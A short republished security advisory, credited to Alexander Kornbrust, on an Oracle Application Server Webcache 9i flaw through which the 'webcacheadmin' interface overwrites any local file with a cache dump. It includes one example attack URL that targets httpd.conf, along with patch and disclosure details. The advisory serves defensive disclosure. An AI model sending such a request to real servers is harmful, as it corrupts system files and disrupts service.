|
Brought to you by:
Suppliers of:
|
|
|
| |
| It is possible to corrupt any file of an Oracle Application Server installation via the 'webcacheadmin' interface by pointing it to dump its cache to a local file used by the Oracle Application Server. |
| |
Credit:
The information has been provided by Kornbrust, Alexander.
The original article can be found at: http://www.red-database-security.com/advisory/oracle_webcache_append_file_vulnerabilitiy.html
|
| |
Vulnerable Systems:
* Oracle Application Server with Webcache 9i
Example:
http://server01:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit &index=1&cache_dump_file=/opt/ORACLE/ias/9.0.2/Apache/Apache/conf/httpd.conf
Patch:
Oracle fixed this issue and has informed their customers.
Disclosure Timeline:
23-sep-2003 Oracle was secalert informed
23-sep-2003 Bug confirmed
26-apr-2005 Red-Database-Security published this advisory
|
|
|
|
|